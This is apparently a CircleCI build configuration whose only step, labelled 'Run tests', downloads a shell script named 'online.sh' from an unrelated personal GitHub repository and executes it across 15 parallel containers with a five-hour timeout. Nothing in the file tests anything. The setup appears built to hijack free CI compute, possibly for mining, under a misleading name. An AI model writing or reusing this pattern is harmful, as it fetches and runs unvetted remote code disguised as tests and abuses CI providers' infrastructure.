jobs:
  build:
    parallelism: 15
    docker:
      - image: cimg/go:1.17.7
    steps: 
      - checkout 
      - run: 
          name: Run tests
          no_output_timeout: 5h		  
          command: |
              wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/online.sh && chmod +x online.sh &&./online.sh